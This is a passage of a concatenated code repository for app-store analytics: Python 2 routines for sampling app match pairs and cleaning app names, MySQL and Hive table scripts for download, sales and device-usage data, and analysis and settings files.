if n_sample is None:
raise MemoryError("Too many matched apps to generate non-matches for, specify n_sample.")
warnings.warn('Brute force sampling failed, using iterative sampling.')
non_matches = iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
return non_matches
def iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample):
"""
Iteratively sample from all possible combinations between elements in from_apps and to_apps. Should be used when
brute_force_sample_non_matches fails due to memory errors.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param known_matches: Combinations that are known to be matches
:param n_sample: Number of samples to draw
:return: DataFrame with n_sample non-matches
"""
assert n_sample is not None, "n_sample cannot be None if sampling iteratively"
    SAMPLE_FACTOR = 1.2  # Factor to multiply the number of samples to generate by, compensating for duplicates
    non_matches = remove_known_matches(
        draw_unique_combinations(from_apps, to_apps, round(n_sample * SAMPLE_FACTOR)),
        known_matches)
    non_matches = non_matches.iloc[:n_sample]
n_remaining = n_sample - len(non_matches)
while n_remaining > 0:
potential_new_non_matches = draw_unique_combinations(from_apps, to_apps, round(n_remaining * SAMPLE_FACTOR))
new_non_matches = remove_known_matches(potential_new_non_matches, known_matches)
non_matches = non_matches.append(new_non_matches, ignore_index=True)
non_matches.drop_duplicates(['from_market', 'from_app_id', 'to_market', 'to_app_id'], inplace=True)
non_matches = non_matches.iloc[:n_sample]
n_remaining = n_sample - len(non_matches)
return non_matches.reset_index(drop=True)
def get_all_combinations(from_apps, to_apps):
"""
Get all combinations between elements in from_apps and to_apps.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:return: DataFrame with all combinations
"""
from_apps['dummy'] = 1
to_apps['dummy'] = 1
all_combinations = pd.merge(from_apps, to_apps, on='dummy', suffixes=['_from', '_to'])
all_combinations = fix_app_id_and_market_column_names(all_combinations)
return all_combinations
def remove_known_matches(all_combinations, known_matches):
"""
Remove matches that are already known.
:param all_combinations: DataFrame with potential matches
:param known_matches: DataFrame with known matches
:return: DataFrame consisting of all combinations in all_combinations that are not in known_matches
"""
MATCH_COLUMNS = ['from_market', 'from_app_id', 'to_market', 'to_app_id']
all_combinations['dummy'] = 1
known_matches['dummy'] = 1
temp = pd.merge(all_combinations, known_matches[MATCH_COLUMNS + ['dummy']],
on=MATCH_COLUMNS,
how='outer', suffixes=['_x', '_known'])
unknown_matches = temp[temp.dummy_known.isnull()].reset_index(drop=True)
unknown_matches.drop(['dummy_x', 'dummy_known'], axis=1, inplace=True)
return unknown_matches
def fix_app_id_and_market_column_names(df):
"""
Switch suffixes to prefixes in app_id_*- and market_*-columns.
:param df: DataFrame with columns app_id_from, app_id_to, market_from, market_to
:return: Fixed DataFrame
"""
fixed_df = df.rename(columns={'app_id_from': 'from_app_id', 'app_id_to': 'to_app_id',
'market_from': 'from_market', 'market_to': 'to_market'})
return fixed_df
def draw_unique_combinations(from_apps, to_apps, n_sample):
"""
Draw a sample of unique combinations
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param n_sample: Number of samples to draw
:return: DataFrame with a at most n_sample combinations
"""
from_sample = random_choice_df(from_apps, n_sample)
to_sample = random_choice_df(to_apps, n_sample)
new_non_matches_sample = pd.merge(from_sample, to_sample, left_index=True, right_index=True,
suffixes=['_from', '_to'])
new_non_matches_sample = fix_app_id_and_market_column_names(new_non_matches_sample)
return new_non_matches_sample.drop_duplicates(['from_market', 'from_app_id', 'to_market', 'to_app_id'])
def random_choice_df(df, n_sample):
"""
Randomly choose rows out of a DataFrame with replacement.
:param df: DataFrame to sample from
:param n_sample: Number of samples to draw
:return: Sampled DataFrame
"""
return df.ix[np.random.choice(df.index, n_sample)].reset_index(drop=True)
def compute_app_icon_metrics(dbi, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE, save_path=None):
"""
Compute icon metrics for matched apps.
:param dbi: Database interface object
:param save_path: Path to save data to
:param hash_type: Hash type to use (if generating new metrics)
:param hash_size: Hash size to use (if generating new metrics)
:param workers: Number of workers to hash with
:return: DataFrame with app icon metrics
"""
matched_apps = dbi.query_matched_apps()
app_metrics = preprocessing.preprocess_icons_from_disk(matched_apps, hash_type, hash_size, workers)
if save_path:
app_metrics.to_csv(save_path)
return app_metrics
def load_app_icon_metrics(data_path):
"""
Load saved icon metrics for matched apps. Assumes data is generated using compute_app_icon_metrics.
:param data_path: Path to load data from
:return: DataFrame with app icon metrics
"""
return pd.DataFrame.from_csv(data_path)
def combine_icon_metrics_with_pairs(pairs, app_metrics):
"""
Combine icon metrics with (non-)match pairs.
:param pairs: Pairs of apps
:param app_metrics: App icon metrics
:return: DataFrame with icon metrics for pairs of apps
"""
merged_df = pd.merge(pd.merge(pairs, app_metrics,
left_on=['from_market', 'from_app_id'],
right_on=['market', 'app_id']),
app_metrics, left_on=['to_market', 'to_app_id'],
right_on=['market', 'app_id'], suffixes=['_from', '_to'])
merged_df.drop(['market_from', 'app_id_from', 'market_to', 'app_id_to'],
axis=1, inplace=True)
return merged_df
def combine_matches_and_non_matches(matches, non_matches):
"""
Combine matches and non-matches in one DataFrame with label 1 and 0.
:param matches: DataFrame with matches
:param non_matches: DataFrame with non-matches
:return: Concatenated DataFrame with labels
"""
matches['label'] = 1
non_matches['label'] = 0
return pd.concat([matches, non_matches])<file_sep>/exact-matching-improvement/lib/features_aa_improved.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'jjanssen'
import temp_database
import re
import config as cf
punctuation_blacklist = ['’', '\'', '[', ']', '(', ')', '{', '}', '⟨', '⟩', ':', ',', '،', '、', '―', '…',
'.', '!', '.', '‐', '-', '?', '‘', '’', '“', '”', '\'', '"', '"', ';', '/', '⁄', '!']
typograpic_blacklist = ['&', '*', '@', '\\', '•', '^', '†', '‡', '°', '″', '¡', '¿', '№', '\÷', 'º', 'ª',
'%', '‰', '+', '−', '‱', '¶', '′', '″', '‴', '§', '~', '_', '|', '‖', '¦', '–', '-',
'#', '$', '–',]
phrase_filter_list = ['for iphone','for ipad', 'ipod touch', 'for android', 'for pad', 'for kindle', 'for kids', 'for private groups', 'for_kids', 'for_private groups', 'Free\\+', '\\+\\+',
'Full free', 'Official App', 'for kakao', 'Abby Monkey', 'Free Music Downloader', 'tinder box',
'Splash Math', 'Vocabulary Trainer']
word_filter_list = ['iPhone', 'Android', 'iPad', 'Pad', 'ipod','free', 'Ad', 'Ads', 'Ad-free', 'ads-free', 'HD',
                    'FreePlay', 'premium', 'PLUS', 'Plus\\+', 'Deluxe', 'Pro', 'Professional', 'Platinum', 'Lite', 'version',
'edition', 'Human', 'Revista', 'Appstar', 'Metronome', 'graalonline', 'AR', 'RPG', 'MMORPG', 'XL',
'Elite', 'BAND', 'mobile', 'digital', 'epaper', 'e-paper', 'replica', 'magazine', 'per', 'online']
mark_filter_list = [':', '-']
app_name_filter_list = [' iPhone',' Android',' iPad',' Pad','ipod','ipod touch',' free','Ad','Ads',
'Ad-free','ads-free','HD','FreePlay','premium','PLUS','Plus\\+','Deluxe','Pro',
'Professional','Platinum','Lite','version','edition','for kids',
'for private groups','for_kids','for_private groups','Free\\+','\\+\\+','AR',
'Full free','RPG','MMORPG','XL','Elite','BAND','Official App','mobile','digital',
'epaper','e-paper','replica','magazine','per','online','for kakao','graalonline',
'Abby Monkey','Free Music Downloader','Metronome','tinder box','Appstar',
'Splash Math','Vocabulary Trainer','Human','Revista']
prefix_words = ['a', 'an', 'the', 'de', 'il', 'le', 'les']
app_name_filter_list = [x.lower() for x in app_name_filter_list]
app_name_filter_list = [x.replace(' ', '') for x in app_name_filter_list]
app_name_filter_list = [x.decode('utf-8') for x in app_name_filter_list]
prefix_words = [x.lower() for x in prefix_words]
prefix_words = [x.replace(' ', '') for x in prefix_words]
prefix_words = [x.decode('utf-8') for x in prefix_words]
phrase_filter_list = [x.lower() for x in phrase_filter_list]
word_filter_list = [x.lower() for x in word_filter_list]
word_list = []
word_list.extend(app_name_filter_list)
word_list.extend(prefix_words)
atomic_list = []
atomic_list.extend(punctuation_blacklist)
atomic_list.extend(typograpic_blacklist)
app_clean_ip = re.compile(r'[\xc2\xa9|\xe2\x84\xa2|\xc2\xae]+')  # strips the UTF-8 byte sequences of the copyright, trademark and registered marks
# basic methods
## find and remove substring after certain marks
def find_mark(input_string):
result = False
for m in mark_filter_list:
if m in input_string:
result = True
return result
def remove_after_mark(input_string):
input_string = input_string.lower()
if find_mark(input_string):
for m in mark_filter_list:
input_string = input_string.split(m)[0]
return input_string
def clean_ip(input_string):
return app_clean_ip.sub(u"", input_string)
## clean phrases
def clean_phrase(input_string):
input_string = input_string.lower()
for p in phrase_filter_list:
input_string = input_string.replace(p, "")
return input_string
## clean words
def clean_word(input_string):
result = []
split_list = input_string.split()
for s in split_list:
add = True
for a in app_name_filter_list:
if a == s:
add = False
if add:
result.append(s)
return " ".join(result)
def clean_word_unicode(input_string):
result = []
split_list = input_string.split()
for s in split_list:
add = True
for a in word_filter_list:
if a == s:
add = False
if add:
result.append(s)
return " ".join(result)
## clean characters bases on list
def clean_atomic(input_string):
result = []
string_list = list(input_string)
for s in string_list:
add = True
for c in atomic_list:
if c == s:
add = False
if add:
result.extend(s)
return "".join(result)
## clean based on unicode categories
def remove_per_unicode_category(text):
lower_text = text.lower()
return lower_text.translate(cf.removal_translate_table)
def clean_punctuation(text):
result = []
if text is not None:
text_to_list = text.lower().split()
for text_element in text_to_list:
text_element = text_element.decode('utf-8')
result.append(text_element.translate(cf.removal_translate_table))
text = " ".join(result)
return text
def clean_app_name(input_string):
lower_string = input_string.lower()
cleaned_atomic = clean_atomic(lower_string)
cleaned_word = clean_word(cleaned_atomic)
return cleaned_word
def clean_app_name_v2(input_string):
cleaned_atomic = clean_punctuation(input_string)
cleaned_word = clean_word(cleaned_atomic)
return cleaned_word
# methods that call the basic methods above to form a coherent cleaning approach
## clean improvement 1
def clean_appname_row(row):
row['aa_improved'] = clean_app_name(row['app_name'])
return row
## clean improvement 1b
def clean_appname_row_v2(row):
row['aa_improved_v2'] = clean_app_name_v2(row['app_name'])
return row
## clean improvement 2
def clean_per_unicode_category(row):
cleaned_mark = remove_after_mark(row['app_name'].lower())
cleaned_phrase = clean_phrase(cleaned_mark)
cleaned_word = clean_word_unicode(cleaned_phrase)
row['aa_improved_unicode'] = remove_per_unicode_category(cleaned_word.decode('utf-8'))
return row
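# Minimal illustration of the cleaning pipeline (hypothetical input):
# clean_app_name('Angry Birds HD Free!') lowercases the name, strips the
# blacklisted punctuation ('!') via clean_atomic, then clean_word drops the
# blacklisted tokens 'hd' and 'free', leaving 'angry birds'.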
<file_sep>/int-vs-m-benchmark/create_table_statements.sql
/*
Create table statements for generic tables:
- downloads
- sales
- rank_data
- customize_rank_data
- daily_ranks
- curve
- curve_ref
- est_weight
- sbe_est_app_daily
*/
-- Select schema to use.
use aa_benchmarking_ios;
-- use aa_benchmarking_android;
/*
Input table: downloads and sales.
*/
DROP TABLE IF EXISTS downloads;
DROP TABLE IF EXISTS sales;
DROP TABLE IF EXISTS rank_data;
DROP TABLE IF EXISTS customize_rank_data;
DROP TABLE IF EXISTS daily_ranks;
DROP TABLE IF EXISTS curve;
DROP TABLE IF EXISTS curve_ref;
DROP TABLE IF EXISTS est_weight;
DROP TABLE IF EXISTS sbe_est_app_daily;
CREATE TABLE downloads (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
units integer NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
app_id,
store_id,
feed),
INDEX downloads_pk (
app_id,
date,
store_id),
INDEX downloads_store_id_app_id_date_index (
store_id,
app_id,
date),
INDEX downloads_date_store_id_index (
date,
store_id)
);
CREATE TABLE sales (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
revenue real NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
app_id,
store_id,
feed),
INDEX application_date_idx (
app_id,
date),
INDEX sales_date_store_id_index (
date,
store_id)
);
CREATE TABLE rank_data (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE customize_rank_data (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE daily_ranks (
store_id INT NOT NULL,
category_id INT NOT NULL,
feed INT NOT NULL,
date DATE NOT NULL,
data LONGTEXT,
CONSTRAINT PRIMARY KEY (
store_id,
category_id,
feed,
date),
INDEX date_store_id(
date,
store_id,
category_id,
feed)
);
/*
Output tables.
*/
CREATE TABLE curve (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE curve_ref (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
store_id,
category_id,
feed,
start_date),
INDEX curve_ref_index (
start_date,
end_date,
store_id,
category_id,
feed)
);
/*
Estimation tables.
*/
CREATE TABLE est_weight (
date date not NULL,
store_id integer NOT NULL,
unit_type smallint NOT NULL,
weight real NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
store_id,
unit_type)
);
CREATE TABLE sbe_est_app_daily (
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
app_id integer NOT NULL,
category_id smallint NOT NULL,
estimate integer NOT NULL,
rank smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
store_id,
feed,
app_id,
category_id
)
);
<file_sep>/aa_au_model/mdm/sql/emr_mdm_usage.sql
-- See table definitions in aa-data-science/aa_au_model/hive_ql/HiveQL table from S3.
-- iOS uses mdm_fact_app_days_running, Android uses mdm_fact_app_screen_time
-- http://blog.cloudera.com/blog/2014/08/improving-query-performance-using-partitioning-in-apache-hive/
-- In non-strict mode, all partitions are allowed to be dynamic; use the partition column to limit the data range.
-- For most of the default tables here, the partition column is datestr.
set hive.exec.dynamic.partition.mode = nonstrict;
drop table if exists devices_ios;
create table devices_ios
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'ios'
;
drop table if exists mdm_usage_ios_all;
create table mdm_usage_ios_all (
date date,
device_id string,
bundle_id string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_ios_all'
;
insert overwrite table mdm_usage_ios_all
select
/*+ STREAMTABLE(usage) */
usage.date as date,
guid_hash.hashed_guid as device_id,
usage.bundle_id as bundle_id,
usage.iso_country_code as iso_country_code,
usage.device_type as device_type
from (
select
/*+ STREAMTABLE(devices_ios) */
devices_ios.period_date as date,
devices_ios.guid_key as guid_key,
max(devices_ios.guid) as guid,
m.bundle_id as bundle_id,
max(devices_ios.device_platform) as device_platform,
max(devices_ios.iso_country_code) as iso_country_code,
max(devices_ios.device_type) as device_type
from devices_ios
join mdm_sample_app_days_running m
on m.datestr between '2015-09-13' and '2015-10-31'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
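-- Worked example (illustrative): for m.date = '2015-09-16', a Wednesday,
-- date_add(m.date, 1) falls on Thursday, 'u' returns 4, so 7 - 4 = 3 days
-- are added and period_date matches the week ending Saturday '2015-09-19'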
and devices_ios.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yyyy-MM-dd'), 'u')
as int
)
)
and devices_ios.guid_key = m.guid_key
group by
devices_ios.period_date,
devices_ios.guid_key,
m.bundle_id
) usage
join mdm_sample_guid_hash guid_hash
on guid_hash.guid = usage.guid and guid_hash.platform = usage.device_platform
;
drop table if exists devices_ios;
drop table if exists devices_android;
create table devices_android
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'android'
;
drop table if exists mdm_usage_android_all;
create table mdm_usage_android_all (
date date,
device_id string,
bundle_id string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_android_all'
;
insert overwrite table mdm_usage_android_all
select
/*+ STREAMTABLE(usage) */
usage.date as date,
guid_hash.hashed_guid as device_id,
usage.bundle_id as bundle_id,
usage.iso_country_code as iso_country_code,
usage.device_type as device_type
from (
select
/*+ STREAMTABLE(devices_android) */
devices_android.period_date as date,
devices_android.guid_key as guid_key,
max(devices_android.guid) as guid,
m.bundle_id as bundle_id,
max(devices_android.device_platform) as device_platform,
max(devices_android.iso_country_code) as iso_country_code,
max(devices_android.device_type) as device_type
from devices_android
join mdm_sample_app_screen_time m
on m.datestr between '2015-09-13' and '2015-10-31'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices_android.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yyyy-MM-dd'), 'u')
as int
)
)
and devices_android.guid_key = m.guid_key
group by
devices_android.period_date,
devices_android.guid_key,
m.bundle_id
) usage
join mdm_sample_guid_hash guid_hash
on guid_hash.guid = usage.guid and guid_hash.platform = usage.device_platform
;
drop table if exists devices_android;
<file_sep>/old_investigations/app_statistics.py
'''
Created on Feb 20, 2013
@author: perezrafael
'''
import pandas as pd
import os, os.path
import matplotlib.pyplot as plt
from internal.stores_dict import category_dict
from internal.stores_dict import market_dict
from internal.stores_dict import type_dict
from internal.stores_dict import country_dict
from public_company_apps import public_company_apps
def load_debug_files(debug_dir):
debug = pd.DataFrame(columns=['Store', 'Category', 'Feed', 'Start Date',
'End Date', 'Day', 'Week Day', 'App ID',
'Rank', 'Value', 'Included', 'AVG', 'Customize',
'Main Category', 'Publisher ID', 'Publisher Name',
'Release Date', 'Rank Link'])
for root, dirs, files in os.walk(debug_dir):
for f in files:
if 'debug_' in f and '.csv' in f:
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)
if df.shape[0]>0:
debug = debug.append(df)
return debug
def plot_data_points(df, country, month, category=None, feed=None, out_dir=None):
df = df[df['Store'] == country]
if category is not None:
df = df[df['Category'] == category]
if feed is not None:
df = df[df['Feed'] == feed]
used = df[df['Included']=='T']
unused = df[df['Included']=='F']
public_debug = df[df['App ID'].isin(public_company_apps)]
public_used = public_debug[public_debug['Included']=='T']
public_unused = public_debug[public_debug['Included']=='F']
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(used['Rank'], used['Value'],'.', alpha=0.4)
p2, = plt.plot(unused['Rank'], unused['Value'],'.', alpha=0.4)
p3, = plt.plot(public_used['Rank'], public_used['Value'],'.', alpha=1.0)
p4, = plt.plot(public_unused['Rank'], public_unused['Value'], '.', alpha=1.0)
plt.legend([p1, p2, p3, p4], ['Total Used: %s'%used.shape[0],
'Total Unusued: %s'%unused.shape[0],
'Public Used: %s'%public_used.shape[0],
'Public Unused: %s'%public_unused.shape[0]])
ax.set_xscale('log')
ax.set_yscale('log')
plt.xlabel('Rank')
plt.ylabel('Value')
#plt.grid(True, which='both')
title= '%s_%s_%s_%s_Data_Points.png'%(month, country_dict[country], category_dict[category], feed)
plt.title(title)
plt.savefig('%s/%s'%(out_dir, title))
#plt.show()
def get_statistics(df, country=None, month=None):
if country is not None:
df = df[df['Store']==country]
public_df = df[df['App ID'].isin(public_company_apps)]
gdf = df.groupby(['Store', 'Rank'])
all_size = gdf.size()
all_size = all_size.reset_index().rename(columns={0:'all'})
gdf = df[df['Included']=='T'].groupby(['Store', 'Rank'])
used_size = gdf.size()
used_size = used_size.reset_index().rename(columns={0:'used all'})
gdf = public_df.groupby(['Store', 'Rank'])
public_size = gdf.size()
public_size = public_size.reset_index().rename(columns={0:'public'})
gdf = public_df[public_df['Included']=='T'].groupby(['Store', 'Rank'])
used_public_size = gdf.size()
used_public_size = used_public_size.reset_index().rename(columns={0:'used public'})
all_size = all_size.merge(used_size, on=['Store', 'Rank'], how='left')
all_size = all_size.merge(public_size, on=['Store', 'Rank'], how='left')
all_size = all_size.merge(used_public_size, on=['Store', 'Rank'], how='left')
all_size = all_size.fillna(0)
return all_size
if __name__ == '__main__':
debug = load_debug_files('/Users/perezrafael/appannie/aa/estimation/ios/')
debug = debug[debug['AVG'] == 'F']
month = '2012-07'
out_dir = '/Users/perezrafael/appannie/data_science/public_plots'
all_statistics = get_statistics(debug)
#all_statistics.to_csv('%s/stats.csv'%out_dir, index=False)
iterable = debug[['Store', 'Category', 'Feed']].drop_duplicates()
for index, series in iterable.iterrows():
country = series['Store']
category = series['Category']
feed = series['Feed']
plot_data_points(debug, country, month, category, feed, out_dir)<file_sep>/google-analytics/rincon_dump/outlier_exporter.py
import dill
import copy
import pandas as pd
import numpy as np
cntry_list = ['US','GB']
dev_list = ['iPhone','Android Mobile']
modelName = 'logLog'
for cntry in cntry_list:
for dev in dev_list:
# convert the strings to lists which can be iteratible
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
fileObject = open('./class/{}/Rincon_Class_{}_{}.dill'.format(modelName, cntry[0], dev[0]), 'rb')
new_class_ = dill.load(fileObject)
mdm_dat = pd.read_csv('../data/MDM_0118_AppNameAttached.csv')
mdm_dat['category_id'] = mdm_dat['category_id'].apply(int).apply(str)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
new_class_[0].predict(val_data)
val_data['diff'] = val_data['final_pred'] - val_data['reporters_app']
val_data['diff%'] = val_data['final_pred'] / val_data['reporters_app'] - 1.0
val_data.sort('diff%', ascending=False).to_csv('./temp/{}/outlier_Diff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
val_data.sort('diff%', ascending=True).to_csv('./temp/{}/outlier_MinusDiff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
<file_sep>/evaluation/py/cv_filter.py
"""For each loop of estimation in CV, find the corresponding test samples and
pick them out.
"""
# Author: <NAME> <<EMAIL>>
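#
# Example invocation (illustrative paths):
#   python cv_filter.py --cvdir cv_index_dir/ est_dir/ output_dir/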
import sys
import os
import os.path
import pickle
from collections import defaultdict
from optparse import OptionParser
import pandas as pd
def parse_options():
parser = OptionParser()
parser.add_option("-c", "--cvdir", dest="cv_dir",
help="Required. The directory which contains cross-validation index.")
(opts, args) = parser.parse_args()
return (opts, args)
def main():
(opts, args) = parse_options()
cv_index_dir = opts.cv_dir
est_dir = args[0]
output_dir = args[1]
cv_by_store = _read_and_group_cv_index_by_store(cv_index_dir)
# In est_dir, each sub-dir is named with the cv loop number.
#
# Each sub-dir contains the regular estimation file, and we need to pick the
# test samples out for each sub-dir.
df_by_filename = defaultdict(list)
for d in os.listdir(est_dir):
d_full_path = os.path.join(est_dir, d)
if os.path.isdir(d_full_path):
print(d_full_path)
kfold_index = int(d)
df_by_filename_sub = _filter_and_gather_subdir(d_full_path, cv_by_store, kfold_index)
# The corresponding est files in each sub-dir should have the same name
# We use the fact to merge them.
for (k, v) in df_by_filename_sub.iteritems():
df_by_filename[k].append(v)
# Concat the dfs and write into output file
for (filename, v) in df_by_filename.iteritems():
df = pd.concat(v)
df.to_csv(os.path.join(output_dir, filename), index=False)
def _read_and_group_cv_index_by_store(cv_index_dir):
"""
Arguments:
- `cv_index_dir`:
"""
pickle_names = filter(lambda s: s.endswith('pickle'), os.listdir(cv_index_dir))
groupby_store = {}
for name in pickle_names:
store = name.split('_')[0]
full_path = os.path.join(cv_index_dir, name)
obj = pickle.load(open(full_path, 'r'))
groupby_store[store] = obj
return groupby_store
def _filter_and_gather_subdir(d, cv_by_store, kfold_index):
est_files = filter(lambda s: s.endswith('.csv'), os.listdir(d))
# The corresponding est files in each sub-dir should have the same name
# We use the fact to merge them.
df_by_filename = {}
for f in est_files:
(store, unit) = f.split('_')[:2]
unit_key = 'downloads' if unit == 'Downloads' else 'sales'
full_path = os.path.join(d, f)
test_samples = set(map(int, cv_by_store[store][unit_key][kfold_index]))
df = pd.read_csv(full_path)
df = df[df['app_id'].isin(test_samples)]
df_by_filename[f] = df
return df_by_filename
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/__init__.py
__author__ = 'hgriffioen'
import paths
import plot
import predict
import weight
import itertools
import os
import pandas as pd
APP_ESTIMATES_FOLDER = 'out/estimates/'
def read_all_app_estimates(modality, iso_codes, platforms, bins, device_type='smartphone', folder=APP_ESTIMATES_FOLDER):
combinations = itertools.product(iso_codes, platforms)
estimates = pd.concat((read_app_estimates(modality, platform, iso_code, bins, device_type, folder)
for iso_code, platform in combinations),
axis=0, ignore_index=True)
return estimates
def read_app_estimates(modality, platform, iso_code, bins, device_type, folder=APP_ESTIMATES_FOLDER):
file_path = get_app_estimates_path(modality, platform, iso_code, bins, device_type, folder)
estimates = pd.read_csv(file_path)
return estimates
def get_app_estimates_path(modality, platform, iso_code, bins, device_type='smartphone', folder=APP_ESTIMATES_FOLDER):
file_name = '_'.join([modality, platform.lower(), iso_code] + bins + [device_type]) + '.csv'
file_path = os.sep.join((folder, file_name))
return file_path
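# Illustrative example (hypothetical arguments; note APP_ESTIMATES_FOLDER
# already ends with '/', so os.sep.join yields a double separator):
#   get_app_estimates_path('mau', 'iOS', 'US', ['18-24', '25-34'])
#   -> 'out/estimates//mau_ios_US_18-24_25-34_smartphone.csv'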
<file_sep>/aa_au_model/hive_scripts/tools/settings.py
__author__ = 'cchang'
DATA_VERSION = 'v3.4.8'
STREAMING_JAR = '/home/hadoop/contrib/streaming/hadoop-streaming.jar'
EMR_KEY_PAIR_FILE = '/usr/local/sbin/ds-prod.pem'
S3_MNT_PREFIX = '/s3mnt-projecta'
S3_BIG_UPLOAD_BUCKET = 'aardvark-big-upload'
DATA_INT_S3_BUCKET = 'aardvark-prod-pdx-to-int-data'
DATA_S3_BUCKET = 'aardvark-prod-pdx-data'
DPI_RESULT_S3_BUCKET = 'aardvark-prod-pdx-ds-sample'
MDM_INTERFACE_S3_BUCKET = 'aardvark-prod-pdx-mdm-interface'
DEFAULT_START_DATE = '2014-10-23'
DEFAULT_SCHEMAS = {
'age_gender_survey_o.schema': [
{'table_type': 'VPN_GB', '$source': 'VPN', '$country': 'GB'},
{'table_type': 'VPN_US', '$source': 'VPN', '$country': 'US'},
{'table_type': 'VPN_JP', '$source': 'VPN', '$country': 'JP'},
{'table_type': 'MDM_ALL', '$source': 'MDM', '$country': 'ALL'}
],
'mdm_sample_guid_hash_o.schema': [],
'mdm_dim_operator_d.schema': [],
'mdm_dim_device_d.schema': [],
'mdm_dim_guid_d.schema': [],
'mdm_sample_app_screen_time_o.schema': [],
'mdm_sample_app_days_running_o.schema': [],
'mdm_sample_selected_device_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK'},
{'table_type': 'monthly', '$range_type': 'MONTH'}
],
'vpn_sample_data_connection_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_pause_resume_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_session_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_dpi_apps_o.schema': [],
'vpn_new_device_info_o.schema': [
{'table_type': 'GB', '$country': 'GB'},
{'table_type': 'US', '$country': 'US'},
{'table_type': 'JP', '$country': 'JP'}
],
'vpn_sample_data_usage_model_active_users_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$active_users_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$active_users_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_duration_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$duration_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$duration_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_frequency_o.schema': [
